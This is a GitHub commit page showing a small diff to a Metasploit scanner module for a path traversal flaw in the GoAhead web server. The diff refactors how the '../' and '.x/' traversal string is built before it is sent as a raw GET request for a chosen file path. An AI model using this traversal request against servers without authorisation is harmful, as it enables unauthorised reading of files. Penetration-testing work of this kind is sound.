We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent d399d05 commit 441042eCopy full SHA for 441042e
modules/auxiliary/scanner/http/goahead_traversal.rb
@@ -42,14 +42,13 @@ def initialize(info = {})
42
end
43
44
def run_host(ip)
45
- traversal = "../" * datastore['DEPTH']
46
- segments = ".x/" * datastore['DEPTH']
+ traversal = "../" * datastore['DEPTH'] << ".x/" * datastore['DEPTH']
47
filename = datastore['FILEPATH']
48
filename = filename[1, filename.length] if filename =~ /^\//
49
50
res = send_request_raw({
51
'method' => 'GET',
52
- 'uri' => "#{traversal}#{segments}#{filename}"
+ 'uri' => "#{traversal}#{filename}"
53
})
54
55
if res &&
0 commit comments